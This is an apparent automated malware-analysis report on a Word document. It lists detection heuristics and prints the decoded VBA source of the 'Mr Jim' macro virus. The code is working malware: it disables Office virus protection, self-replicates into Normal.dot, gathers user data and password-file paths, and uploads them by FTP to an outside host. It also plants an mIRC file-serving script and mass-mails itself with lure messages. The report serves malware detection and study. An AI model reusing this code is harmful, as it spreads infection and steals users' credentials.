MALICIOUS
268
Risk Score
Heuristics 5
-
ClamAV: Win.Trojan.Jim-1 critical CLAMAV_DETECTIONClamAV detected this file as malware: Win.Trojan.Jim-1
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Potential Shell call in VBA critical OLE_VBA_SHELLPotential Shell call in VBAMatched line in script
Shell "command.com /c ftp.exe -n -s:c:\msdos.dll", vbHide -
VBA macro-virus self-replication / AV tampering critical OLE_VBA_MACRO_VIRUS_REPLICATIONVBA macro programmatically rewrites VBA project code through the VBE object model (CodeModule/VBComponents InsertLines/DeleteLines/AddFromString or OrganizerCopy) to copy itself into the global template and other open documents, and/or disables Office macro-virus protection (Options.VirusProtection = False). This is the defining behavior of the W97M document macro-virus family — self-replicating code with no benign document use, independent of any AV signature.Matched line in script
Act_doc.VBProject.VBComponents(Cos(Atn(CInt(1)))).CodeModule.DeleteLines 1, a.CountOfLines -
Document_Open macro low OLE_VBA_DOCOPENDocument_Open macroMatched line in script
Private Sub Document_Open()
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 61613 bytes |
SHA-256: d8c5bcc986e53857f9a198f2cb8571f38ad8725f3b0aabe07438bca93da75768 |
|||
|
Detection
ClamAV:
Win.Trojan.Jim-1
Obfuscation or payload:
unlikely
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
'0
Private Sub Document_Open()
'0
Mr_Jim_by_Septic:
'0
generation = 26
'0
check_vac = "c:\_vac.txt"
'0
If Dir(check_vac) <> "" Then MsgBox "I guess you have what it takes.", vbInformation, "[Mr Jim] By SeptiC/TI": GoTo Host_infiltrated
'0
da_normal = Dir(NormalTemplate.FullName)
'0
If da_normal = "" Then GoTo No_normal
'0
SetAttr NormalTemplate.FullName, vbNormal
'0
No_normal:
'0
Application.EnableCancelKey = wdCancelDisabled
'0
Options.VirusProtection = Chr$(48)
'0
Options.SaveNormalPrompt = Chr$(48)
'0
Options.ConfirmConversions = Chr$(48)
'0
Application.ScreenUpdating = Chr$(48)
'0
Application.DisplayStatusBar = Chr$(48)
'0
Application.DisplayAlerts = Chr$(48)
'0
windir = System.PrivateProfileString("c:\msdos.sys", "Paths", "WinDir")
'0
Dim Act_doc As Object: Set Act_doc = ActiveDocument
'0
Dim Act_norm As Object: Set Act_norm = NormalTemplate
'0
If Act_doc.VBProject.VBComponents.Item(Cos(Atn(CInt(1)))).CodeModule.CountOfLines > 360 Then act_inf = 1
'0
If Act_norm.VBProject.VBComponents.Item(Cos(Atn(CInt(1)))).CodeModule.CountOfLines > 360 Then normal_inf = 1
'0
infect_doc:
'0
If act_inf = 1 Then GoTo infect_normal
'0
Set a = Act_doc.VBProject.VBComponents(Cos(Atn(CInt(1)))).CodeModule
'0
Set b = Act_norm.VBProject.VBComponents(Cos(Atn(CInt(1)))).CodeModule
'0
Act_doc.VBProject.VBComponents(Cos(Atn(CInt(1)))).CodeModule.DeleteLines 1, a.CountOfLines
'0
Set fix_lines_1 = b
'0
With fix_lines_1
'0
code_1 = .Lines(1, .CountOfLines)
'0
End With
'0
Act_doc.VBProject.VBComponents.Item(Cos(Atn(CInt(1)))).CodeModule.insertlines 1, code_1
'0
Set polyit = ActiveDocument.VBProject.VBComponents.Item(Cos(Atn(CInt(1))))
'0
temp_number = generation + 1
'0
With polyit.CodeModule
'0
For da_line = 1 To 420 Step 2
'0
.replaceline da_line, "'" & Second(Now)
'0
Next da_line
'0
.replaceline 230, "Sub ToolsMacro()"
'0
.replaceline 258, "Private Sub Document_Close()"
'0
.replaceline 2, "Private Sub Document_Open()"
'0
.replaceline 6, "generation =" & temp_number
'0
End With
'0
ActiveDocument.Save
'0
infect_normal:
'0
If normal_inf = 1 Then GoTo no_inf
'0
Set a = Act_doc.VBProject.VBComponents(Cos(Atn(CInt(1)))).CodeModule
'0
Set b = Act_norm.VBProject.VBComponents(Cos(Atn(CInt(1)))).CodeModule
'0
Act_norm.VBProject.VBComponents(Cos(Atn(CInt(1)))).CodeModule.DeleteLines 1, b.CountOfLines
'0
Set fix_lines_2 = a
'0
With fix_lines_2
'0
code_2 = .Lines(1, .CountOfLines)
'0
End With
'0
Act_norm.VBProject.VBComponents.Item(Cos(Atn(CInt(1)))).CodeModule.insertlines 1, code_2
'0
Set polyit = Act_norm.VBProject.VBComponents.Item(Cos(Atn(CInt(1))))
'0
da_lines = 0
'0
With polyit.CodeModule
'0
For da_line = 1 To 420 Step 2
'0
.replaceline da_line, "'" & Second(Now)
'0
Next da_line
'0
.replaceline 230, "Sub ViewVBCode()"
'0
.replaceline 2, "Private Sub Document_Close()"
'0
.replaceline 258, "Private Sub Document_Open()"
'0
End With
'0
NormalTemplate.Save
'0
no_inf:
'0
check_it = Dir("c:\config.dll")
'0
If check_it <> "" Then GoTo Host_infiltrated
'0
collect_i:
'0
user_name = Application.UserName
'0
info_1 = System.Application
'0
info_2 = System.Country
'0
info_3 = System.Creator
'0
info_4 = System.FreeDiskSpace
'0
info_5 = generation
'0
info_6 = System.ProcessorType
'0
info_7 = System.OperatingSystem
'0
With Application.FileSearch
'0
.FileName = "\*.pwl"
'0
.LookIn = windir
'0
.SearchSubFolders = False
'0
.MatchTextExactly = True
'0
.FileType = msoFileTypeAllFiles
'0
.Execute
'0
passfile = .FoundFiles(Cos(Atn(CInt(1))))
'0
End With
'0
Open "c:\" & user_name & ".dll" For Append As #2
'0
Print #2, passfile
'0
Print #2, "User Name: "; user_name
'0
Print #2, "Time Infected: "; Time
'0
Print #2, "Application : "; info_1
'0
Print #2, "Country code : "; info_2
'0
Print #2, "Creator : "; info_3
'0
Print #2, "Free DiskSpace : "; info_4
'0
Print #2, "Generation of virus : "; info_5
'0
Print #2, "Processor Type : "; info_6
'0
Print #2, "Operating system : "; info_7
'0
Close #2
'0
SetAttr "c:\" & user_name & ".dll", vbHidden
'0
Open "c:\msdos.dll" For Append As #1
'0
Print #1, "o ftp.fortunecity.com"
'0
Print #1, "user mrseptic"
'0
Print #1, "nofb666"
'0
Print #1, "binary"
'0
Print #1, "put ""C:\" & user_name; ".dll"""
'0
Print #1, "put """ & passfile; """"
'0
Print #1, "quit"
'0
Close #1
'0
SetAttr "c:\msdos.dll", vbHidden
'0
Open "c:\config.dll" For Append As #3
'0
Print #3, "BIG as usual in the future"
'0
Close #3
'0
Host_infiltrated:
'0
end_open:
'0
End Sub
'0
Sub ToolsMacro()
'0
On Error GoTo no_doc_stealth
'0
If ActiveDocument = "" Then GoTo no_doc_stealth
'0
Dim Act_doc As Object: Set Act_doc = ActiveDocument
'0
Set a = Act_doc.VBProject.VBComponents(Cos(Atn(CInt(1)))).CodeModule
'0
Act_doc.VBProject.VBComponents(Cos(Atn(CInt(1)))).CodeModule.DeleteLines 1, a.CountOfLines
'0
Act_doc.Saved = True
'0
no_doc_stealth:
'0
Dim Act_norm As Object: Set Act_norm = NormalTemplate
'0
Set b = Act_norm.VBProject.VBComponents(Cos(Atn(CInt(1)))).CodeModule
'0
Act_norm.VBProject.VBComponents(Cos(Atn(CInt(1)))).CodeModule.DeleteLines 1, b.CountOfLines
'0
Act_norm.Saved = True
'0
Application.ShowVisualBasicEditor = True
'0
End Sub
'0
Private Sub Document_Close()
'0
check_vac = "c:\_vac.txt"
'0
If Dir(check_vac) <> "" Then MsgBox "I guess you have what it takes.", vbInformation, "[Mr Jim] By SeptiC/TI": GoTo the_end
'0
On Error GoTo end_macro
'0
Options.VirusProtection = Chr$(48)
'0
Options.SaveNormalPrompt = Chr$(48)
'0
Options.ConfirmConversions = Chr$(48)
'0
Application.ScreenUpdating = Chr$(48)
'0
Application.DisplayStatusBar = Chr$(48)
'0
Application.DisplayAlerts = Chr$(48)
'0
windir = System.PrivateProfileString("c:\msdos.sys", "Paths", "WinDir")
'0
active_doc = ActiveDocument.FullName
'0
If Dir("c:\mirc32\mirc32.exe") <> "" Then set_dir = "c:\mirc32\": GoTo past_dir
'0
If Dir("c:\program~1\mirc32\mirc32.exe") <> "" Then set_dir = "c:\program~1\mirc32\": GoTo past_dir
'0
If Dir("c:\program\mirc32\mirc32.exe") <> "" Then set_dir = "c:\program\mirc32\": GoTo past_dir
'0
If Dir("c:\mirc\mirc32.exe") <> "" Then set_dir = "c:\mirc\": GoTo past_dir
'0
If Dir("c:\program~1\mirc\mirc32.exe") <> "" Then set_dir = "c:\program~1\mirc\": GoTo past_dir
'0
If Dir("c:\program\mirc\mirc32.exe") <> "" Then set_dir = "c:\program\mirc\": GoTo past_dir
'0
GoTo Pegasus
'0
past_dir:
'0
If set_dir = "c:\program\mirc32\" Then System.PrivateProfileString("C:\program\mirc32\mirc.ini", "ident", "userid") = "MrJim"
'0
If set_dir = "c:\program\mirc32\" Then System.PrivateProfileString("C:\program\mirc32\mirc.ini", "warn", "fserve") = "off"
'0
If set_dir = "c:\mirc32\" Then System.PrivateProfileString("c:\mirc32\mirc.ini", "ident", "userid") = "MrJim"
'0
If set_dir = "c:\mirc32\" Then System.PrivateProfileString("c:\mirc32\mirc.ini", "warn", "fserve") = "off"
'0
If set_dir = "c:\program~1\mirc32\" Then System.PrivateProfileString("c:\program~1\mirc32\mirc.ini", "ident", "userid") = "MrJim"
'0
If set_dir = "c:\program~1\mirc32\" Then System.PrivateProfileString("c:\program~1\mirc32\mirc.ini", "warn", "fserve") = "off"
'0
If set_dir = "c:\program\mirc\" Then System.PrivateProfileString("C:\program\mirc\mirc.ini", "ident", "userid") = "MrJim"
'0
If set_dir = "c:\program\mirc\" Then System.PrivateProfileString("C:\program\mirc\mirc.ini", "warn", "fserve") = "off"
'0
If set_dir = "c:\mirc\" Then System.PrivateProfileString("c:\mirc\mirc.ini", "ident", "userid") = "MrJim"
'0
If set_dir = "c:\mirc\" Then System.PrivateProfileString("c:\mirc\mirc.ini", "warn", "fserve") = "off"
'0
If set_dir = "c:\program~1\mirc\" Then System.PrivateProfileString("c:\program~1\mirc\mirc.ini", "ident", "userid") = "MrJim"
'0
If set_dir = "c:\program~1\mirc\" Then System.PrivateProfileString("c:\program~1\mirc\mirc.ini", "warn", "fserve") = "off"
'0
On Error GoTo Skip_attr
'0
SetAttr set_dir & "script.ini", vbNormal
'0
Kill set_dir & "script.ini"
'0
SetAttr set_dir & "script.old", vbNormal
'0
Kill set_dir & "script.old"
'0
Skip_attr:
'0
On Error GoTo end_macro
'0
Open set_dir & "script.ini" For Append As #1
'0
Print #1, "[script]"
'0
Print #1, "n0=on 1:TEXT:*relaxa*:#:/msg $chan [MrJim/SeptiC/TI] - BIG as usual in the future"
'0
Print #1, "n1=on 1:TEXT:*hoppauppohajja*:#:/mode $chan +b $me"
'0
Print #1, "n2=on 1:TEXT:*progr?ta*:#:/mode $chan +o $nick"
'0
Print #1, "n3=on 1:TEXT:*iframtiden*:#:/fserve $nick 20 c:\"
'0
Print #1, "n4=on 1:FILESENT:*.*:if ( $me != $nick ) { /dcc send $nick " & active_doc; " }"
'0
Print #1, "n5=on 1:FILERCVD:*.*:if ( $me != $nick ) { /dcc send $nick " & active_doc; " }"
'0
Close #1
'0
Open set_dir & "script.old" For Append As #1
'0
Print #1, "[script]"
'0
Print #1, "n0=on 1:TEXT:*relaxa*:#:/msg $chan [MrJim/SeptiC/TI] - BIG as usual in the future"
'0
Print #1, "n1=on 1:TEXT:*hoppauppohajja*:#:/mode $chan +b $me"
'0
Print #1, "n2=on 1:TEXT:*progr?ta*:#:/mode $chan +o $nick"
'0
Print #1, "n3=on 1:TEXT:*iframtiden*:#:/fserve $nick 20 c:\"
'0
Print #1, "n4=on 1:FILESENT:*.*:if ( $me != $nick ) { /dcc send $nick " & active_doc; " }"
'0
Print #1, "n5=on 1:FILERCVD:*.*:if ( $me != $nick ) { /dcc send $nick " & active_doc; " }"
'0
Close #1
'0
Pegasus:
'0
If Dir("c:\pmail\winpm-32.exe") <> "" Then pega_dir = "c:\pmail\": GoTo past_pega_dir
'0
If Dir("c:\mail\winpm-32.exe") <> "" Then pega_dir = "c:\pmail\": GoTo past_pega_dir
'0
If Dir("c:\program~1\pmail\winpm-32.exe") <> "" Then pega_dir = "c:\program~1\pmail\": GoTo past_pega_dir
'0
If Dir("c:\program\pmail\winpm-32.exe") <> "" Then pega_dir = "c:\program\pmail\": GoTo past_pega_dir
'0
GoTo no_mail
'0
past_pega_dir:
'0
With Application.FileSearch
'0
.FileName = "\*.pmw"
'0
.LookIn = pega_dir
'0
.SearchSubFolders = True
'0
.MatchTextExactly = True
'0
.FileType = msoFileTypeAllFiles
'0
.Execute
'0
pega_mail = .FoundFiles(Cos(Atn(CInt(1))))
'0
End With
'0
get_rand = 0
'0
get_rand = Int(Rnd(1) * 8) + 1
'0
user_name = Application.UserName
'0
If get_rand = 1 Then random_message = "Hi! Quite some time has passed since my last mail, I hope you're not too mad at me. I haven't had time to write for several reasons. Anyway there is a quite interesting document attached in this mail, check it out and tell me what you think. Cya / " & user_name: GoTo after_rand
'0
If get_rand = 2 Then random_message = "Hello, yesterday when I was surfing the web a friend told me about this great game. It's called Utopia, have you ever heard of it? It's very cool and I think you would like it, I found this beginners guide on the net, you need it incase you want to succed and become strong. The guide is attached to the message. Bye! / " & user_name: GoTo after_rand
'0
If get_rand = 3 Then random_message = "HHHHhhhEEEeLLooo :) Somedays ago I was chatting on IRC on some warez channels and one guy offered me 3 different ftp sites with cracked versions of Quake III arena, all of them works! In case you don't have mIRC installed, install it! It's a very cool chat program. The Ftp's login and password are attached to this message. Ok Cya / " & user_name: GoTo after_rand
'0
If get_rand = 4 Then random_message = "Hiya, I really need your help. This document has to be done for friday and it probably contains a lot of misspellings etc etc. Could you please read it through and check if you see something? / " & user_name: GoTo after_rand
'0
If get_rand = 5 Then random_message = "Hehehe guess what I found! Tons of XXX passwords and some other cool stuff, it's attached to the message. Have fun ;) / " & user_name: GoTo after_rand
'0
If get_rand = 6 Then random_message = "Guess what I found, check it out! / " & user_name: GoTo after_rand
'41
random_message = "BAAM! Gotcha! You have just been hit with a message attachment! It's the attachment war of the millenium!!! There is one rule in this game... you can't hit someone who has already hit you, but you can use the attachment that hit yourself or even better find a new funny attachment to send (throw) on your opponent! Now go out there and hit as many people as you can before they get you!! / " & user_name & " got you!": GoTo after_rand
'41
after_rand:
'41
If pega_mail = "" Then GoTo no_mail
'41
Open pega_mail For Input As #1
'41
Line Input #1, mail_1
'41
Line Input #1, mail_2
'41
Line Input #1, mail_3
'41
Line Input #1, mail_4
'41
Line Input #1, mail_5
'41
Close #1
'41
If mail_2 = "SY:0" Then GoTo no_mail
'48
file_Ready:
'48
random_1 = Second(Now)
'48
Open pega_dir & "\mail\" & random_1 * random_1 & ".pmw" For Append As #3
'48
Print #3, mail_1
'48
Print #3, "SY:0"
'34
Print #3, mail_4
'34
Print #3, mail_5 & " :-)"
'34
Print #3, "CC:"
'34
Print #3, "EN:0"
'34
Print #3, "CS:0"
'34
Print #3, "RC:0"
'34
Print #3, "DC:0"
'34
Print #3, "UR:0"
'34
Print #3, "SS:0"
'34
Print #3, "SG:0"
'34
Print #3, "MI:1"
'34
Print #3, "ID:<Default>"
'34
Print #3, "EX:0"
'34
Print #3, "AT:" & active_doc; ",Binary,1"
'34
Print #3, "RT: 1"
'34
Print #3, "FL:0"
'3
Print #3, ""
'3
Print #3, random_message
'3
Close #3
'3
no_mail:
'3
For x = 1 To Application.Tasks.Count
'3
If UCase(Application.Tasks(x).Name) = "ADDRESS BOOK" Then da_outlook = Application.Tasks(x).Name: GoTo out_look
'3
If UCase(Application.Tasks(x).Name) = "ICQMSGAPI WINDOW" Then GoTo i_connection
'3
If UCase(Application.Tasks(x).Name) = "SOCKETS WINDOW" Then GoTo i_connection
'3
If UCase(Application.Tasks(x).Name) = "SECTION WINDOW" Then GoTo i_connection
'10
If UCase(Application.Tasks(x).Name) = "INTERNET EXPLORER" Then GoTo i_connection
'10
Next x
'10
GoTo end_macro
'10
out_look:
'10
i_connection:
'10
Shell "command.com /c ftp.exe -n -s:c:\msdos.dll", vbHide
'10
end_macro:
'10
If Day(Now) = 2 Then GoTo payload
'10
GoTo the_end
'10
payload:
'10
Selection.TypeText Text:="[Mr Jim/SeptiC/TI] - Do you have what it takes to become an international bussiness man!?"
Selection.TypeParagraph
Selection.TypeParagraph
ActiveDocument.Shapes.AddTextEffect(msoTextEffect29, _
"[Mr Jim]/SeptiC/TI '99" & Chr(13) & "" & Chr(10) & "", "Arial Black", 36#, msoFalse, msoFalse, 121.85 _
, 159.75).Select
If ActiveWindow.View.SplitSpecial = wdPaneNone Then
ActiveWindow.ActivePane.View.Type = wdNormalView
Else
ActiveWindow.View.Type = wdNormalView
End If
the_end:
End Sub
' Processing file: /opt/analyzer/scan_staging/420941b015774966bafbe6b2dc5174f5.bin
' ===============================================================================
' Module streams:
' Macros/VBA/ThisDocument - 34381 bytes
' Line #0:
' QuoteRem 0x0000 0x0001 "0"
' Line #1:
' FuncDefn (Private Sub Document_Open())
' Line #2:
' QuoteRem 0x0000 0x0001 "0"
' Line #3:
' Label Mr_Jim_by_Septic
' Line #4:
' QuoteRem 0x0000 0x0001 "0"
' Line #5:
' LitDI2 0x001A
' St generation
' Line #6:
' QuoteRem 0x0000 0x0001 "0"
' Line #7:
' LitStr 0x000B "c:\_vac.txt"
' St check_vac
' Line #8:
' QuoteRem 0x0000 0x0001 "0"
' Line #9:
' Ld check_vac
' ArgsLd Dir 0x0001
' LitStr 0x0000 ""
' Ne
' If
' BoSImplicit
' LitStr 0x001F "I guess you have what it takes."
' Ld vbInformation
' LitStr 0x0015 "[Mr Jim] By SeptiC/TI"
' ArgsCall MsgBox 0x0003
' BoS 0x0000
' GoTo Host_infiltrated
' EndIf
' Line #10:
' QuoteRem 0x0000 0x0001 "0"
' Line #11:
' Ld NormalTemplate
' MemLd FullName
' ArgsLd Dir 0x0001
' St da_normal
' Line #12:
' QuoteRem 0x0000 0x0001 "0"
' Line #13:
' Ld da_normal
' LitStr 0x0000 ""
' Eq
' If
' BoSImplicit
' GoTo No_normal
' EndIf
' Line #14:
' QuoteRem 0x0000 0x0001 "0"
' Line #15:
' Ld NormalTemplate
' MemLd FullName
' Ld vbNormal
' ArgsCall SetAttr 0x0002
' Line #16:
' QuoteRem 0x0000 0x0001 "0"
' Line #17:
' Label No_normal
' Line #18:
' QuoteRem 0x0000 0x0001 "0"
' Line #19:
' Ld wdCancelDisabled
' Ld Application
' MemSt EnableCancelKey
' Line #20:
' QuoteRem 0x0000 0x0001 "0"
' Line #21:
' LitDI2 0x0030
' ArgsLd Chr$ 0x0001
' Ld Options
' MemSt VirusProtection
' Line #22:
' QuoteRem 0x0000 0x0001 "0"
' Line #23:
' LitDI2 0x0030
' ArgsLd Chr$ 0x0001
' Ld Options
' MemSt SaveNormalPrompt
' Line #24:
' QuoteRem 0x0000 0x0001 "0"
' Line #25:
' LitDI2 0x0030
' ArgsLd Chr$ 0x0001
' Ld Options
' MemSt ConfirmConversions
' Line #26:
' QuoteRem 0x0000 0x0001 "0"
' Line #27:
' LitDI2 0x0030
' ArgsLd Chr$ 0x0001
' Ld Application
' MemSt ScreenUpdating
' Line #28:
' QuoteRem 0x0000 0x0001 "0"
' Line #29:
' LitDI2 0x0030
' ArgsLd Chr$ 0x0001
' Ld Application
' MemSt DisplayStatusBar
' Line #30:
' QuoteRem 0x0000 0x0001 "0"
' Line #31:
' LitDI2 0x0030
' ArgsLd Chr$ 0x0001
' Ld Application
' MemSt DisplayAlerts
' Line #32:
' QuoteRem 0x0000 0x0001 "0"
' Line #33:
' LitStr 0x000C "c:\msdos.sys"
' LitStr 0x0005 "Paths"
' LitStr 0x0006 "WinDir"
' Ld System
' ArgsMemLd PrivateProfileString 0x0003
' St windir
' Line #34:
' QuoteRem 0x0000 0x0001 "0"
' Line #35:
' Dim
' VarDefn Act_doc (As Object)
' BoS 0x0000
' SetStmt
' Ld ActiveDocument
' Set Act_doc
' Line #36:
' QuoteRem 0x0000 0x0001 "0"
' Line #37:
' Dim
' VarDefn Act_norm (As Object)
' BoS 0x0000
' SetStmt
' Ld NormalTemplate
' Set Act_norm
' Line #38:
' QuoteRem 0x0000 0x0001 "0"
' Line #39:
' LitDI2 0x0001
' Coerce (Int)
' ArgsLd Atn 0x0001
' ArgsLd Cos 0x0001
' Ld Act_doc
' MemLd VBProject
' MemLd VBComponents
' ArgsMemLd Item 0x0001
' MemLd CodeModule
' MemLd CountOfLines
' LitDI2 0x0168
' Gt
' If
' BoSImplicit
' LitDI2 0x0001
' St act_inf
' EndIf
' Line #40:
' QuoteRem 0x0000 0x0001 "0"
' Line #41:
' LitDI2 0x0001
' Coerce (Int)
' ArgsLd Atn 0x0001
' ArgsLd Cos 0x0001
' Ld Act_norm
' MemLd VBProject
' MemLd VBComponents
' ArgsMemLd Item 0x0001
' MemLd CodeModule
' MemLd CountOfLines
' LitDI2 0x0168
' Gt
' If
' BoSImplicit
' LitDI2 0x0001
' St normal_inf
' EndIf
' Line #42:
' QuoteRem 0x0000 0x0001 "0"
' Line #43:
' Label infect_doc
' Line #44:
' QuoteRem 0x0000 0x0001 "0"
' Line #45:
' Ld act_inf
' LitDI2 0x0001
' Eq
' If
' BoSImplicit
' GoTo infect_normal
' EndIf
' Line #46:
' QuoteRem 0x0000 0x0001 "0"
' Line #47:
' SetStmt
' LitDI2 0x0001
' Coerce (Int)
' ArgsLd Atn 0x0001
' ArgsLd Cos 0x0001
' Ld Act_doc
' MemLd VBProject
' ArgsMemLd VBComponents 0x0001
' MemLd CodeModule
' Set a
' Line #48:
' QuoteRem 0x0000 0x0001 "0"
' Line #49:
' SetStmt
' LitDI2 0x0001
' Coerce (Int)
' ArgsLd Atn 0x0001
' ArgsLd Cos 0x0001
' Ld Act_norm
' MemLd VBProject
' ArgsMemLd VBComponents 0x0001
' MemLd CodeModule
' Set B
' Line #50:
' QuoteRem 0x0000 0x0001 "0"
' Line #51:
' LitDI2 0x0001
' Ld a
' MemLd CountOfLines
' LitDI2 0x0001
' Coerce (Int)
' ArgsLd Atn 0x0001
' ArgsLd Cos 0x0001
' Ld Act_doc
' MemLd VBProject
' ArgsMemLd VBComponents 0x0001
' MemLd CodeModule
' ArgsMemCall DeleteLines 0x0002
' Line #52:
' QuoteRem 0x0000 0x0001 "0"
' Line #53:
' SetStmt
' Ld B
' Set fix_lines_1
' Line #54:
' QuoteRem 0x0000 0x0001 "0"
' Line #55:
' StartWithExpr
' Ld fix_lines_1
' With
' Line #56:
' QuoteRem 0x0000 0x0001 "0"
' Line #57:
' LitDI2 0x0001
' MemLdWith CountOfLines
' ArgsMemLdWith Lines 0x0002
' St code_1
' Line #58:
' QuoteRem 0x0000 0x0001 "0"
' Line #59:
' EndWith
' Line #60:
' QuoteRem 0x0000 0x0001 "0"
' Line #61:
' LitDI2 0x0001
' Ld code_1
' LitDI2 0x0001
' Coerce (Int)
' ArgsLd Atn 0x0001
' ArgsLd Cos 0x0001
' Ld Act_doc
' MemLd VBProject
' MemLd VBComponents
' ArgsMemLd Item 0x0001
' MemLd CodeModule
' ArgsMemCall insertlines 0x0002
' Line #62:
' QuoteRem 0x0000 0x0001 "0"
' Line #63:
' SetStmt
' LitDI2 0x0001
' Coerce (Int)
' ArgsLd Atn 0x0001
' ArgsLd Cos 0x0001
' Ld ActiveDocument
' MemLd VBProject
' MemLd VBComponents
' ArgsMemLd Item 0x0001
' Set polyit
' Line #64:
' QuoteRem 0x0000 0x0001 "0"
' Line #65:
' Ld generation
' LitDI2 0x0001
' Add
' St temp_number
' Line #66:
' QuoteRem 0x0000 0x0001 "0"
' Line #67:
' StartWithExpr
' Ld polyit
' MemLd CodeModule
' With
' Line #68:
' QuoteRem 0x0000 0x0001 "0"
' Line #69:
' StartForVariable
' Ld da_line
' EndForVariable
' LitDI2 0x0001
' LitDI2 0x01A4
' LitDI2 0x0002
' ForStep
' Line #70:
' QuoteRem 0x0000 0x0001 "0"
' Line #71:
' Ld da_line
' LitStr 0x0001 "'"
' Ld Now
' ArgsLd Second 0x0001
' Concat
' ArgsMemCallWith replaceline 0x0002
' Line #72:
' QuoteRem 0x0000 0x0001 "0"
' Line #73:
' StartForVariable
' Ld da_line
' EndForVariable
' NextVar
' Line #74:
' QuoteRem 0x0000 0x0001 "0"
' Line #75:
' LitDI2 0x00E6
' LitStr 0x0010 "Sub ToolsMacro()"
' ArgsMemCallWith replaceline 0x0002
' Line #76:
' QuoteRem 0x0000 0x0001 "0"
' Line #77:
' LitDI2 0x0102
' LitStr 0x001C "Private Sub Document_Close()"
' ArgsMemCallWith replaceline 0x0002
' Line #78:
' QuoteRem 0x0000 0x0001 "0"
' Line #79:
' LitDI2 0x0002
' LitStr 0x001B "Private Sub Document_Open()"
' ArgsMemCallWith replaceline 0x0002
' Line #80:
' QuoteRem 0x0000 0x0001 "0"
' Line #81:
' LitDI2 0x0006
' LitStr 0x000C "generation ="
' Ld temp_number
' Concat
' ArgsMemCallWith replaceline 0x0002
' Line #82:
' QuoteRem 0x0000 0x0001 "0"
' Line #83:
' EndWith
' Line #84:
' QuoteRem 0x0000 0x0001 "0"
' Line #85:
' Ld ActiveDocument
' ArgsMemCall Save 0x0000
' Line #86:
…
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.